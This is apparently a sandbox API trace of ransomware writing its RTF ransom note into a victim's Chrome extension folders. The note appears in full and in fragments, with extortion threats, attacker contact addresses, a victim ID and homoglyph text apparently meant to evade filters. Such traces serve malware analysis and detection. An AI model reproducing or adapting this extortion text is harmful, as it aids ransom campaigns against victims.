\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.639] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0297.639] WriteFile (in: hFile=0x294, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.640] CloseHandle (hObject=0x294) returned 1 [0297.640] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\#readme_eman#.rtf")) returned 0xffffffff [0297.640] GetLastError () returned 0x2 [0297.640] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.641] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE 